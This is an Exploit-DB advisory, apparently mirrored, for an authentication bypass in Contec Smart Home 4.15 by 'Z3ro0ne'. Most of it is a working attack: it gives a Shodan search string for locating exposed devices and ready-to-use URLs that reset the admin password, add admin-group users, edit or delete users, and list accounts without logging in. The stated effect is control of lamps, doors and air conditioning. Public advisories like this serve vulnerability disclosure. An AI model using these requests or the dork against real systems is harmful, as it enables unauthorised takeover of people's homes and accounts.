Contec Smart Home 4.15 – Unauthorized Password Reset

  • 作者: Z3ro0ne
    日期: 2018-03-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44295/
  • # Title: Contec smart home 4.15 Unauthorized Password Reset
    # Shodan Dork		 : "content/smarthome.php"
    # Vendor Homepage: http://contec.co.il
    # Tested on: Google Chrome
    # Tested version : 4.15
    # Date : 2018-03-14
    # Author : Z3ro0ne
    # Contact: saadousfar59@gmail.com
    # Facebook Page: https://www.facebook.com/Z3ro0ne
     
    # Vulnerability description :
    the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
    
    
    # Exploit 
    
     To Reset Admin password 
     http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
     
     To Create a new user
     http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
     
    To edit a user
     http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
     
     To Delete a user 
     http://Ipaddress:port/content/delete_user.php?user_name=USER
     
     Users list
     http://Ipaddress:port/content/user.php